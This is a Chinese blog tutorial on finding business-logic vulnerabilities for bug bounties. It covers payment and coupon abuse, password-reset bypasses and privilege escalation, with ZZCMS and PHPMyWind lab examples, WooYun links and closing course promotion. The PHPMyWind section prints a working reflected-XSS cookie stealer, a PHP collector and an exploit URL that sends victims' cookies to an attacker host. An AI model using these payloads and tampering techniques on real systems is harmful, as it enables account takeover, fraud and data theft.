SRC逻辑漏洞挖掘详解以及思路和技巧(非常详细)零基础入门到精通,收藏这一篇就够了

绝对干货!src漏洞挖掘经验分享 公粽号:黒掌 一个专注于分享渗透测试、黑客圈热点、黑客工具技术区博主! src漏洞挖掘经验分享 – 掌控安全以恒 一、公益src 公益src是一个白帽子提交随机发现的漏洞的品台,我们可以把我们随机发现或者是主动寻找到的漏洞漏洞盒子进行提交。 在挖掘src的时候不能越红线,一般情况下遇到SQL注入 只获取数据库名字以证明漏洞的存在即可,最好不要再往下获取。而xss漏洞 ,只获取自己的cookie或ip等信息以证明漏洞存在。遇到信息泄露时,如果存在可以下载敏感文件的情况那么在漏洞确认后一定要将文件删除。. 阅读详情

0X00 逻辑漏洞概述

由于程序逻辑不严谨或逻辑太过复杂,导致一些逻辑分支不能正常处理或处理错误,统称为业务逻辑漏洞。常见的逻辑漏洞有交易支付、密码修改、密码找回、越权修改、越权查询、突破限制等,下图是简单的逻辑漏洞总结,在挖掘的过程中更多的时候需要脑洞大开:

挖掘逻辑漏洞的过程中,需要一些技巧和非常规思路,有点像边缘测试的思想。一般的思路是:

确定业务流程--->寻找流程中可以被操控的环节--->分析可被操控环节中可能产生的逻辑问题--->尝试修改参数触发逻辑问题

0X01 逻辑漏洞分类

0X01:饮料贩卖机``   ``替换订单ID,创建订单时在支付界面,在此创建订单替换订单ID(高价替换低价)``无限新用户优惠订单,重复创建优惠订单``替换优惠卷ID(未达到条件使用)``个别情况订单数量为1.99时,客户端只支付1元,实际上服务器认为支付了2元。``取货时并发(真实案例)``   ``0X02:直播``   ``快速进出房间炸房``无限发送点赞协议``修改礼物数量,0,小数,负数,特定值(一般情况下为1073741824)``修改礼物ID,遍历尝试是否有隐藏ID。``并发送礼物,抽奖``无限创建首次优惠订单,有些首次优惠订单是一个特殊的pid,这种的直接替换pid进行支付。有些是相同的ID,这种的提前创建订单,记录多个订单号在依次修改订单支付。``刷屏:发言刷屏,分享,点赞等有提示的地方刷屏``房间内可以申请的地方进行申请取消操作,看看是否能炸房。``越权踢人,增加管理员,关闭房间等操作。``发送的表情是否可以修改长宽(真实案例)``   ``0X03 :购物app``   ``购买数量:为0,小数,负数,正负值(A为-1,B为2,总值为1)``代金卷:并发领取,遍历领取,同一个代金卷重复使用,未满足条件使用代金卷``越权:登陆,操作别人订单,修改资料``   ``0X04:外卖``   ``商品数量,0,负数,小数,特定值,正负数(A为-1,B为2,总值为1)``送餐员评价修改,星级,打赏金额(小数,负数)``商品评价,星级,评论字数,上传图片是否可以自定义格式,``订单超出送餐地址``强行货到付款,取消订单,退款``越权操作别人订单,登陆``优惠购买会员(重复使用优惠购买)``   ``0X05:交易平台``   ``钱包并发提现,负数提现``使用钱包支付时多个订单并发支付(是否支付金额能大于余额)``转账负数,并发转账``上架商品突破限制,例如数量,字数。``替换订单,创建订单号如果订单状态可修改,先进到支付界面,然后将订单修改成更大的金额,然后支付提前进入的支付界面``数量修改``   ``0X06:社交``   ``强行举报(读取本地消息上传那种)``强行加好友(一般尝试重发通过好友这条协议)``自由修改号码(靓号类)``群管理无限禁言``越权禁言,替人,拉黑``会员修改金额,数量。无限优惠购买``非会员使用会员功能``   ``0X07:漫画``   ``打赏金额为负数,小数,特定值(溢出)``越权删除评论,登陆``修改充值金额``付费漫画免费看``评论图片数量过多会导致客户端加载卡死``   ``0X08:音乐``   ``唱歌类软件修改上传分数等参数``付费下载尝试替换下载ID``修改付费下载金额``F12查看下是否有歌曲地址``   ``0X09:网约车``   ``无限叫车,重复发送协议造成市场混乱``修改评价分数``修改限时优惠叫车关键参数``替换优惠卷``越权操作其他订单

业务逻辑漏洞需要对业务熟悉,有很强的逻辑思维能力,所以下面主要描述一下ZZCMS8.1中注册、登录和密码找回出现的漏洞逻辑,再尽量多和全的收集整理相关场景。

0X02 逻辑漏洞利用实例

ZZCMS 8.1

批量注册

我们把注册功能填写相关信息,然后抓包:

将数据包发送到repeater,每次修改username值,发现,只需要修改username值就可以注册成功用户,图形验证码无效,并且未对电话,邮箱等信息校验,可批量注册。

批量猜解用户

同样是注册功能,在输入用户名时,发现会提示用户名是否存在,猜测该位置可以猜测哪些用户注册过该网站。

抓取该位置数据包发现,会对用户名id进行判断,是否存在,是否符合规则,由此我们可以批量探测用户,发现可以批量探测已注册过的用户:

任意密码重置

在忘记密码功能,我们输入用户名正确后会进行短信验证码,通过手机验证码或者邮箱验证码。

在验证码功能中输入验证码进行验证,发现其中有一段JavaScript代码document.userreg.yzm_mobile2.value=='no'是用来验证验证码是否正确,那么就可以直接在控制台直接改变这个值就可以绕过验证码:

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

平行越权

越权又可分为平行越权(相同用户)、垂直越权(低权限用户和高权限用户)、未授权访问(无需用户直接操作)。

登录普通用户test2,查看用户敏感的页面:

发送到repteater数据包中,看到cookie中存在username参数,修改为已存在的用户名,发现返回包中可查看其他用户敏感信息。

0X03 PHPMyWind 5.5

由于网上没有找到PHPMyWind5.5的源码,只能看看其他师傅分析的文章,这里就再大概复述一遍。

首先对实验环境做一个简单说明:

服务器192.168.114.159部署有“PHPMyWind 5.5”
攻击机(safedog)192.168.114.1部署有能“收集PHPMyWind用户的Cookie”的PHP脚本、JS脚本
受害者(victim)192.168.114.161可通过浏览器访问“服务器”上的“PHPMyWind”网站

1.过程1代表攻击者safedog通过邮件等方式发送恶意链接(嵌有可盗取并发送Cookie的JS脚本)给受害者victim;

2.过程2代表在受害者victim受诱导点击恶意链接后,会经由浏览器将攻击者safedog嵌入的JS脚本当做数据发送给服务器上的PHPMyWind网站的反射型XSS漏洞点;

3.过程3与过程4代表PHPMyWind网站在受到反射型XSS攻击后,会执行JS脚本,将受害者victim的Cookie返回给受害者victim,并发送给攻击者safedog。

4.过程5代表攻击者safedog在获得受害者victim的Cookie后,利用受害者victim的Cookie与PHPMyWind网站的逻辑漏洞点进行密码重置攻击。

反射型XSS

攻击者搭建可接收受害者Cookie的PHP网站;

该PHP网站由“ReflectiveXSS.js”“ReflectiveXSS.php”和“cookie.txt”这3个文件构成。

其中“ReflectiveXSS.js”用于针对服务器端PHPMyWind网站的反射型XSS漏洞窃取受害者victim的Cookie,并将该Cookie值传输给ReflectiveXSS.php;“ReflectiveXSS.php”用于接收名为“victimcookie”的GET请求,并将“victimcookie”的参数值保存到“cookie.txt”。

ReflectiveXSS.js的代码如下:

1
2
3
4
5
6
7
8
//通过指定的名称'img'创建img元素
var img = document.createElement('img');
img.width = 0;
img.height = 0;

//将img元素的src属性指向脚本文件ReflectiveXSS.php
//将cookie信息的字符串作为URI组件进行编码,然后用victimcookie参数传递
img.src = 'http://192.168.114.1/safedog-attack/ReflectiveXSS.php?victimcookie='+encodeURIComponent(document.cookie);

ReflectiveXSS.php的代码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php
@ini_set('display_errors',1);
$str = $_GET['victimcookie'];
$filePath = "cookie.txt";

if(is_writable($filePath)==false){
echo "can't write";
}else{
$handler = fopen($filePath, 'a');
fwrite($handler, $str);
fclose($handler);
}
?>

出发XSS漏洞的EXP:

1
http://192.168.114.159/phpmywind5-5/data/api/oauth/connect.php?method=unknownmethod<script src=http://192.168.114.1/safedog-attack/ReflectiveXSS.js></script>

出现XSS漏洞的地方:

该漏洞出现的文件路径为:/data/api/oauth/connect.php,其中的代码段:

1
2
3
4
if(method_exists($connect, $method))
$connect->method();
else
echo "请求的方法[" . $method . "不存在";

if判断的作用是“判断函数名是否存在”,代码的逻辑是“如果函数名不存在,则在PHP页面输出函数名”,这一做法会造成反射型XSS漏洞。

任意密码重置

该漏洞出现的文件路径为:/member.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
//检测旧密码是否正确
if($password != '')
{
$oldpassword = md5(md5($oldpassword));
$r = $dosql->GetOne("SELECT `password` FROM `#@__member` WHERE `username`='$c_uname'");
if($r['password'] != $oldpassword)
{
ShowMsg(msg: '抱歉,旧密码错误!', gourl: '-1');
exit();
}
}

$sql = "UPDATE `#@__member` SET";
if($password != '')
{
$password = md5(md5($password));
$sql .= "password='$password',";
}
@$sql .= "question='$question', answer='$answer', cnname='$cnname', enname='$enname', sex='$sex', birthtype='$birthtype', birth_year='$birth_year', birth_month='$birth_month', birth_day='$birth_day', astro='$astro', bloodtype='$bloodtype', trade='$trade', live_prov='$live_prov', live_city='$live_city', live_country='$live_country', home_prov='$home_prov', home_city='$home_city', home_country='$home_country', cardtype='$cardtype', cardnum='$cardnum', intro='$intro', email='$email', qqnum='$qqnum', mobile='$mobile', telephone='$telephone', address_prov='$address_prov', address_city='$address_city', address_country='$address_country', address='$address', zipcode='$zipcode' WHERE id='$id' AND `username`='$c_uname'";
if($dosql->ExecNoneQuery($sql))
{
ShowMsg(msg: '资料更新成功', gourl: '?c=edit');
exit();
}

第一个if判断的作用是“判断用户提交的新密码是否为空”,在用户提交的新密码不为空的情况下,才会进行‘旧密码的比对’,如果提交的旧密码和数据库的查询结果不一致,则不允许继续进行更换密码的操作。第二个if判断的作用仍为“判断用户提交的新密码是否为空”,在用户提交的新密码不为空的情况下,对新密码进行哈希运算,随后进行SQL语句的拼接。这两个if语句存在了逻辑漏洞。因为,如果我们提交的新密码(password变量和repassword变量)为空,则可以绕过对旧密码(oldpassword变量)的验证。

在这里之所以要使用XSS获取cookie,是因为当SQL语句满足条件id='$id' AND username ='$c_uname';时,才可进行update操作。变量c_uname值(明文)来源于AuthCode($_COOKIE['username']),即先取得Cookie中username(密文)的值,然后通过AuthCode函数配合配置文件中的密钥来获取明文。

PHPMyWind采用Cookie保存混淆化的用户登录信息。因为配置文件中的密钥是在CMS搭建时随机生成的,算法也不可逆,因此要在知道c_name变量的前提下,从正向伪造username等变量,以通过权限验证具有较大难度。为获取Cookie中的username等值,可考虑借助反射型XSS漏洞。

0X04 其他实例

现在wooyun已经没了,只能在一些镜像网站看漏洞合集,以逻辑漏洞为关键词搜索到了186个相关漏洞,基本上把每个漏洞都过了一遍,也没办法复现,记录一些比较有代表性的案例,权当搜集思路吧。

支付业务相关逻辑漏洞
常见手法

1.修改金额;

2.修改商品数量;

3.修改优惠金额;

4.修改数量、单价,优惠价格参数为负数、小数,无限大;

5.商品价格更改;

6.支付key泄露等。

实际安全中会有一些比较特别的,反正各种能改的参数都去尝试。个数_单价-优惠券个数_单价=总额,每个值都可能存在问题,就看服务自身处理是否有问题了。

顺丰宝业务逻辑漏洞:数量和金额没有做签名

https://wooyun.x10sec.org/static/bugs/wooyun-2011-02272.html

移动手机支付业务逻辑漏洞:爆破四位验证码

https://wooyun.x10sec.org/static/bugs/wooyun-2011-02513.html

新东方逻辑支付漏洞:修改运费金额为负数,使得课程金额+运费大于0即可

https://wooyun.x10sec.org/static/bugs/wooyun-2013-019761.html

中国零食网支付逻辑漏洞:同上

https://wooyun.x10sec.org/static/bugs/wooyun-2014-074483.html

阿里云计算按量付费逻辑漏洞一枚(低价享受超级主机):经过base64编码的数据可以被篡改,并且后端会接受篡改的数据

https://wooyun.x10sec.org/static/bugs/wooyun-2013-023789.html

乐视商城支付逻辑漏洞(价格可更改):价格参数明文显示在url,可以直接更改

https://wooyun.x10sec.org/static/bugs/wooyun-2013-036787.html

再次挖掘乐视商城支付逻辑漏洞:同上

https://wooyun.x10sec.org/static/bugs/wooyun-2014-053181.html

读览天下支付逻辑漏洞可刷充值金额:替换支付订单号

https://wooyun.x10sec.org/static/bugs/wooyun-2014-051673.html

益盟爱炒股商城支付逻辑漏洞:修改Cookie中的参数值

https://wooyun.x10sec.org/static/bugs/wooyun-2015-093365.html

饿了么逻辑漏洞之免费吃喝不是梦手机号+;+手机号绕过服务器对手机号码的次数限制

https://wooyun.x10sec.org/static/bugs/wooyun-2015-0125060.html

七夕单身专场之性多多免费刷成人用品(支付逻辑漏洞):改负数刷Dai币

https://wooyun.x10sec.org/static/bugs/wooyun-2015-0135459.html

大疆某处支付逻辑漏洞可1元买无人机:https改为http访问,修改支付的参数

https://wooyun.x10sec.org/static/bugs/wooyun-2016-0194751.html

密码找回相关逻辑漏洞
常见手法

1.找回密码的验证码为四位数字可爆破真实验证码;

2.采用本地验证,可以先尝试修改自己的帐号密码,保存正确的返回包,然后修改他人密码的时候替换返回包;

3.最终修改密码的数据包,以另外的ID作为身份判断(例如userid),而该ID在别处可以获取到;

4.接受验证码的手机号修改为自己的号码,然后输入自己的号码接收到的验证码去进行密码重置;

5.获取验证码的时候,会生成一个身份标识(例如cookie值),那么我们就替换他人账号的身份证重置他人的密码;

具体可以去i春秋看carry_your发过的一篇专门针对

密码重置的视频**:**https://www.ichunqiu.com/course/59045

用户凭证暴力破解

四位或者六位的纯数字

WooYun: 当当网任意用户密码修改漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2012-011833.html

WooYun: 微信任意用户密码修改漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2012-011720.html

返回凭证

url返回验证码及token

WooYun: 走秀网秀团任意密码修改缺陷

https://wooyun.x10sec.org/static/bugs/wooyun-2012-05630.html

WooYun: 天天网任意账户密码重置(二)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-058210.html

密码找回凭证在页面中

通过密保问题找回密码

WooYun: sohu邮箱任意用户密码重置

https://wooyun.x10sec.org/static/bugs/wooyun-2012-04728.html

返回短信验证码

WooYun: 新浪某站任意用户密码修改(验证码与取回逻辑设计不当)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-085124.html

邮箱弱token

时间戳的md5

WooYun: 奇虎360任意用户密码修改漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2012-08333.html

用户名 & 服务器时间

WooYun: 中兴某网站任意用户密码重置漏洞(经典设计缺陷案例)

https://wooyun.x10sec.org/static/bugs/wooyun-2015-090226.html

用户凭证有效性

短信验证码

WooYun: OPPO手机重置任意账户密码(3)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-053349.html

WooYun: 第二次重置OPPO手机官网任意账户密码(秒改)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-053079.html

WooYun: OPPO修改任意帐号密码

https://wooyun.x10sec.org/static/bugs/wooyun-2013-020032.html

邮箱token

WooYun: 身份通任意密码修改-泄漏大量公民信息

https://wooyun.x10sec.org/static/bugs/wooyun-2012-012572.html

重置密码token

WooYun: 魅族的账号系统内存在漏洞可导致任意账户的密码重置

https://wooyun.x10sec.org/static/bugs/wooyun-2014-078208.html

重新绑定

WooYun: 网易邮箱可直接修改其他用户密码

https://wooyun.x10sec.org/static/bugs/wooyun-2012-08307.html

WooYun: 如家酒店某严重逻辑漏洞可登陆任意账号可导致几千万敏感信息泄露(涉及任意用户账号个人基本信息、入住记录等)

https://wooyun.x10sec.org/static/bugs/wooyun-2015-0115537.html

Wooyun: 华住酒店官网某严重逻辑漏洞可登陆任意账号(涉及任意用户账号个人基本信息、入住记录等)

https://wooyun.x10sec.org/static/bugs/wooyun-2015-0115276.html

WooYun: 12308可修改任意用户密码

https://wooyun.x10sec.org/static/bugs/wooyun-2014-081467.html

邮箱绑定

WooYun: 某C票设计缺陷可修改任意用户密码

https://wooyun.x10sec.org/static/bugs/wooyun-2015-092319.html

WooYun: 中国工控网任意用户密码重置漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2014-086726.html

服务器验证

WooYun: 携程旅行网任意老板密码修改(庆在wooyun第100洞)

https://wooyun.x10sec.org/static/bugs/wooyun-2013-018263.html

服务器验证可控内容

WooYun: AA拼车网之任意密码找回2

https://wooyun.x10sec.org/static/bugs/wooyun-2014-080278.html

WooYun: 四川我要去哪517旅行网重置任意账号密码漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2014-082582.html

服务器验证验证逻辑为空

WooYun: 某政企使用邮件系统疑似存在通用设计问题

https://wooyun.x10sec.org/static/bugs/wooyun-2014-088927.html

用户身份验证

账号与手机号码的绑定

WooYun: 上海电信通行证任意密码重置

https://wooyun.x10sec.org/static/bugs/wooyun-2014-075941.html

账号与邮箱账号的绑定

WooYun: 魅族的账号系统内存在漏洞可导致任意账户的密码重置

https://wooyun.x10sec.org/static/bugs/wooyun-2014-078208.html

WooYun: 和讯网修改任意用户密码漏洞

https://wooyun.x10sec.org/static/bugs/wooyun-2015-091216.html

找回步骤

跳过验证步骤、找回方式,直接到设置新密码页面

WooYun: OPPO手机同步密码随意修改,短信通讯录随意查看

https://wooyun.x10sec.org/static/bugs/wooyun-2013-042404.html

WooYun: 中国电信某IDC机房信息安全管理系统设计缺陷致使系统沦陷

https://wooyun.x10sec.org/static/bugs/wooyun-2015-098765.html

本地验证

在本地验证服务器的返回信息,确定是否执行重置密码,但是其返回信息是可控的内容,或者可以得到的内容

WooYun: 看我如何重置乐峰网供应商管理系统任意用户密码(管理员已被重置)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-083035.html

WooYun: oppo重置任意用户密码漏洞(4)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-069987.html

发送短信等验证信息的动作在本地进行,可以通过修改返回包进行控制

WooYun: OPPO修改任意帐号密码-3

https://wooyun.x10sec.org/static/bugs/wooyun-2013-020532.html

WooYun: OPPO修改任意帐号密码-2

https://wooyun.x10sec.org/static/bugs/wooyun-2013-020425.html

注入

在找回密码处存在注入漏洞

WooYun: 用友人力资源管理软件(e-HR)另一处SQL注入漏洞(通杀所有版本)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-068060.html

Token生成

token生成可控

WooYun: 天天网任意账号密码重置(非暴力温柔修改)

https://wooyun.x10sec.org/static/bugs/wooyun-2015-094242.html

WooYun: 天天网再一次重置任意账号密码(依旧非暴力)

https://wooyun.x10sec.org/static/bugs/wooyun-2015-095729.html

注册覆盖

注册重复的用户名

WooYun: 中铁快运奇葩方式重置任意用户密码(admin用户演示)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-088708.html

session覆盖

WooYun: 聚美优品任意修改用户密码(非爆破)

https://wooyun.x10sec.org/static/bugs/wooyun-2014-085843.html

越权相关逻辑漏洞

越权漏洞是Web应用程序中一种常见的安全漏洞。它的威胁在于一个账户即可控制全站用户数据。当然这些数据仅限于存在漏洞功能对应的数据。越权漏洞的成因主要是因为开发人员在对数据进行增、删、改、查询时对客户端请求的数据过分相信而遗漏了权限的判定。所以测试越权就是和开发人员拼细心的过程。

常见手法

1.操作时分析请求中的数据包,看看每个参数的作用,修改参数查看变化。

2.拥有更多权限的账号,把能访问的URL都提取出来,给低权限用户访问或者直接访问,查看能否访问。

3.猜测隐藏的API,如:guest/getorder,修改成admin/getorder。

4.通过搜索引擎,或者提取JS中的URL,查找隐藏功能。如burpsuite中有一个BHP JS scraper的插件。

5.猜测隐藏的参数,添加进去查看变化,如修改信息的时候加个ID。

6.抓取所有的数据包,搜索用户名等关键词,比如我的用户名是test,在burpsuite中的HTTP history搜索test,看看有没有哪个数据包包含这个参数,将其修改为其他的用户名,查看变化。

JSRC——越权漏洞挖掘

JSRC——聊聊越权那些事

我的越权之道

https://wooyun.x10sec.org/static/drops/tips-727.html

垂直越权的手法:

1.编辑个人信息的时候,修改权限组的id,一般管理员的值为0或者1;

2.后台修改密码的地方,如果是根据userid来修改密码的,可以修改id的值来修改管理员的密码;

3.在个人资料处插入XSS脚本,一般能打到管理员cookie的概率很大;

4.查看个人资料的时候,如果是根据id来显示,一般都有越权,可以遍历id获取管理员信息;

5.测试后台功能,找一下注入、上传、命令执行等漏洞,直接拿下数据库权限或者shell,再找管理员权限就轻而易举了。

外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

黑客&网络安全如何学习

今天只要你给我的文章点赞,我私藏的网安学习资料一样免费共享给你们,来看看有哪些东西。

1.学习路线图

攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。

2.视频教程

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。

内容涵盖了网络安全法学习、网络安全运营等保测评、渗透测试基础、漏洞详解、计算机基础知识等,都是网络安全入门必知必会的学习内容。

(都打包成一块的了,不能一一展开,总共300多集)

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

3.技术文档和电子书

技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

4.工具包、面试题和源码

“工欲善其事必先利其器”我为大家总结出了最受欢迎的几十款款黑客工具。涉及范围主要集中在 信息收集、Android黑客工具、自动化工具、网络钓鱼等,感兴趣的同学不容错过。

还有我视频里讲的案例源码和对应的工具包,需要的话也可以拿走。

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

最后就是我这几年整理的网安方面的面试题,如果你是要找网安方面的工作,它们绝对能帮你大忙。

这些题目都是大家在面试深信服、奇安信、腾讯或者其它大厂面试时经常遇到的,如果大家有好的题目或者好的见解欢迎分享。

参考解析:深信服官网、奇安信官网、Freebuf、csdn等

内容特点:条理清晰,含图像化表示更加易懂。

内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…

因篇幅有限,仅展示部分资料,需要点击下方链接即可前往获取

CSDN大礼包:《黑客&网络安全入门&进阶学习资源包》免费分享

怎么入门SRC漏洞挖掘 2. SRC的工作过程 SRC的成员发现漏洞,确认漏洞,报告漏洞,修复漏洞,并公开发布漏洞信息修复信息。2. 漏洞识别漏洞识别是SRC漏洞挖掘重要的一步。3. 拓展攻击面针对已经确定的漏洞,可以尝试进一步拓展攻击面,以便确定该漏洞的影响范围、漏洞的类型等信息。总结: SRC漏洞挖掘工作需要遵守法律道德、多人协作,并加强注意事项的细节,只有这样,我们才能更好地保护系统安全、预防恶意行为对系统带来的破坏。2. 加强团队合作 SRC漏洞挖掘需要团队合作,漏洞挖掘工作需要多人协作,以确保发现并解决所有漏洞 阅读详情

相关推荐

src挖掘技巧总结分享

这⽆疑极⼤拓宽了 SSRF 的攻击⾯。查看js源码中,查看是否存在api的接口,如果存在如:/api/register/user 则可以尝试是否存在可以利用点,一般情况下就直接拼接api接口,如果返回报错了,这里可以通过burp抓包工具抓包,查看调用的什么接口,让后观察请求的内容是否有地理位置,如果存在,则使用百度或者其他地理位置查询,查询到坐标后,进行修改。比如首月多少6,第二个月开始20,尝试在购买的时候,分别使用两个支付方式支付,然后都支付后,发现是否使用两个6元支付,是否能获得两个月的。

yj520400的博客 2323

SRC漏洞挖掘经验+技巧

我们经常听到漏洞这个概念,可什么是安全漏洞?想给它一个清晰完整的定义其实是非常困难的。如果你去搜索一下对于漏洞的定义,基本上会发现高大上的学术界讲求实用的工业界各有各的说法,漏洞相关的各种角色,比如研究者、厂商、用户,对漏洞的认识也是非常不一致的。从业多年,我至今都找不到一个满意的定义,于是我自己定义一个:安全漏洞是信息系统在生命周期的各个阶段(设计、实现、

dzqxwzoe的博客 3873

IEC 104电力规约详细解读() - 报文结构、报文分类、ASDU

比如,双方可以按频率发送,比如接收8帧I帧回答一帧S帧,也可以要求接收1帧I帧就应答1帧S帧,当然也可以不要求(S帧内容示例参考例1)。所以U帧格式的控制欲第一个字节就只有6种情况,分别是0x83(TESTER确认)、0x43(TESTER命令)、0x23(STOPDT确认)、0x13(STOPDT命令)、0x0B(START确认)、0x07(START命令)ASDU(应用服务数据单元),协议原文格式最好去101协议去看看,会比较详细。遥信、遥测、遥控、遥调、总召、对时等都需要使用I格式传送。

张二狗的博客 1万+

SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台

SRC漏洞挖掘--CNVD国家信息安全漏洞共享平台,分享SRC漏洞挖掘思路以及工具介绍脚本分享。

Alone hackers的博客 2万+

SRC漏洞挖掘思路手法(非常详细),零基础入门精通收藏一篇

这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己挖那种大厂的漏洞都挖不倒,挖上一两个小时或者半个小时就不挖了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘别的站点漏洞挖掘都大差不大,但是为什么都感觉自己挖不

Python_paipai的博客 1万+

2024版最新SRC漏洞挖掘思路手法(非常详细),零基础入门精通收藏一篇

这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己挖那种大厂的漏洞都挖不倒,挖上一两个小时或者半个小时就不挖了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘别的站点漏洞挖掘都大差不大,但是为什么都感觉自己挖不

shanguicsdn000的博客 2359

【2025版】最新SRC漏洞挖掘思路手法(非常详细),零基础入门精通收藏这篇就

这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。

喜欢Python编程的程序员柚柚呀 2731

SRC漏洞挖掘思路手法(非常详细网络安全零基础入门精通收藏一篇了!

大家好,我是小强。这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘思路技巧

A1353192296的博客 1643

SRC漏洞挖掘思路手法(非常详细),零基础入门精通收藏一篇了_src漏洞挖掘会越来越窄吗

这段时间挖掘了挺多的SRC漏洞,虽然都是一些水洞,也没有一些高级的漏洞挖掘利用手法,但是闲下来也算是总结一下,说说我对SRC漏洞挖掘思路技巧。很多人可能都挖过很多漏洞其中包括一些EDU或者别的野战,但是对于SRC往往无从下手,感觉自己挖不倒SRC漏洞,这里其实最重要的问题还是自己的心理问题,当然必须还有一定的技术能力。很多都感觉自己挖那种大厂的漏洞都挖不倒,挖上一两个小时或者半个小时就不挖了,没什么进展,往往这种想法是错误的,其实对于一些src漏洞挖掘别的站点漏洞挖掘都大差不大,但是为什么都感觉自己挖不

Spontaneous_0的博客 1381

SRC漏洞挖掘经验+技巧篇,(非常详细零基础入门精通收藏一篇了_网络安全src

公益SRC(Security Response Center,安全响应中心)作为 “合法、免费、贴近真实业务” 的实战场景,长期处于争议中心 —— 部分人认为其 “奖励微薄、漏洞密度低,性价比不足”,也有人将其视为 “新手破局的唯一跳板”。漏洞类型贴近实战:除 OWASP TOP10 基础漏洞(SQL 注入、XSS、文件上传),还存在 “逻辑漏洞(验证码绕过、越权访问)、配置漏洞(弱口令、敏感信息泄露)、业务漏洞(订单金额篡改、流程绕过)” 等企业高频漏洞

bigbangbangbang1的博客 787

【2026版】最新SRC漏洞挖掘思路手法详细版!零基础入门精通,新手收藏这篇就了!

我看见很多小伙伴总说挖SRC漏洞没有思路,今天大家聊一聊我对挖src的一些经验心得。挖SRC一定要细,慢慢的去分析,不能着急往往越着急越挖不倒,这里可以给大家一些建议,在挖掘SRC期间SRC逻辑漏洞一般产出比较高的漏洞就在于逻辑漏洞,别的漏洞也有但是相比起来逻辑漏洞的价值更高一. 国内的一些公益src漏洞平台这里只列举最简单并且比较知名的一些公益src提交平台,还有一些其他的公益src提交平台,就不一一列举了二. 前期的准备工作一些在线的搜索引擎网站:(一)资产测绘引擎。

bdfcfff77fa的博客 1288

实战SRC漏洞挖掘全过程,流程详细网络安全

记录一次完整的某SRC漏洞挖掘实战,为期一个多星期。文章有点长,请耐心看完,记录了完整的SRC漏洞挖掘实战一句话,柿子要挑软的捏。渗透测试思路最重要,每个人在做渗透测试时的思路都不同,有思路有想法才能进行下去。为了回馈铁杆粉丝们,我给大家整理了完整的软件测试视频学习教程,朋友们如果需要可以自行免费领取 【保证100%免费】

主要分享测试的学习资源,帮助快速了解测试行业,帮助想转行、进阶、小白成长为高级测试工程师。 5544

2023最新SRC漏洞挖掘快速上手攻略!

随着网络安全的快速发展,黑客攻击的手段也越来越多样化,因此SRC漏洞挖掘作为一种新的网络安全技术,也在不断发展完善。那么,作为一个网安小白如果想要入门SRC漏洞挖掘,需要掌握哪些知识呢?以下是本人通过多年从事网络安全工作的经验,综合网络上已有的资料,总结得出的指导SRC漏洞挖掘入门详细介绍。1、BugcrowdBugcrowd是一个专门为企业提供漏洞检测、漏洞挖掘漏洞修复、防御安全相关服务的平台,为各大知名企业提供安全检测服务。

2301_77732591的博客 4410

SRC漏洞挖掘经验+技巧篇,零基础入门精通收藏一篇

在HP Data protecetor Media Operations 的客户端连接服务端时,通过私访有的通信协议,客户端会首先检查[系统分区]:\Documents and Settings\[用户名]\Application Data 下面是否有相应的资源(如插件等),如果没有,则会向服务器请求需要的文件,服务器没有验证请求的文件名的合法性,而且这个过程不需要任何验证,攻击者精心构造文件名,可以读取服务端安装目录所在分区的任意文件。最古老的内存破坏类型。漏洞造成的敏感信息泄露导致机密性的破坏;

leah126的博客 2414

